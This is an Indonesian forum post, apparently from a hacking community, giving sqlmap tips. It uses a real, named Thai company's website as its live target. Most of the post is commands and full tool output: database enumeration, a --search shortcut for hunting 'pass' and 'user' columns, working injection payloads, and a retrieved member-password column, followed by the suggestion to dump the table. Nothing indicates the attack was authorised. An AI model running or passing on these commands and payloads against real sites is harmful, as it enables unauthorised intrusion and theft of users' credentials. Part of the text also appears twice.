06-29-2012, 07:13 AM
assalamualaikum wr wb
pagi semua
udah lama gak share trik2 and tips nih jadi kangen ^_^
humm kali ini mau berbagi tentang penggunaan sqlmap.
selama ini penggunaan sqlmap bisa dikatakan selalu seperti ini
(untuk contoh, jangan di pepes webnya)
nah disini
saya sudah tidak menggunakan tepat seperti langkah diatas.
saya menggunakan option --search untuk mencari langsung table login atau table yang mengindikasikan mempunyai kolom login atau password. jadi bisa menggantikan option --tables dan option --columns
ok langsung saja
option --search itu selalu diikut dengan option -C parameter1,parameter2,...[/code] dan option -T parameter1,parameter2,... atau penggunaan salah satunya.
nah dari hasil kita langsung tau bukan nama tabelnya?
tinggal melakukan dumping pada tablenya langsung.
okok sekian dulu dari saya
udah jam 6 lewat ntar ane telat sekolah ^_^
junior mohon pamit
regards
junior dragon
pagi semua
udah lama gak share trik2 and tips nih jadi kangen ^_^
humm kali ini mau berbagi tentang penggunaan sqlmap.
selama ini penggunaan sqlmap bisa dikatakan selalu seperti ini
(untuk contoh, jangan di pepes webnya)
Code:
1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
lalu
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 --dbs
atau
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs
2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname --tables
3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name --columns
4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump
nah disini
saya sudah tidak menggunakan tepat seperti langkah diatas.
saya menggunakan option --search untuk mencari langsung table login atau table yang mengindikasikan mempunyai kolom login atau password. jadi bisa menggantikan option --tables dan option --columns
ok langsung saja
Code:
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user
sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:54:43
[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CID=14 AND 6999=6999
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: CID=14 AND SLEEP(5)
---
[05:54:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+
do you want to dump entries? [Y/n] n
[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'
[*] shutting down at 05:57:34
option --search itu selalu diikut dengan option -C parameter1,parameter2,...[/code] dan option -T parameter1,parameter2,... atau penggunaan salah satunya.
Code:
-C digunakan untuk pencarian nama column didalam database berdasarkan parameter yang dikirim/diberikan
-T digunakan untuk pencarian nama table didalam database berdasarkan parameter yang dikirim/diberikan
nah dari hasil kita langsung tau bukan nama tabelnya?
tinggal melakukan dumping pada tablenya langsung.
okok sekian dulu dari saya
udah jam 6 lewat ntar ane telat sekolah ^_^
junior mohon pamit
regards
junior dragon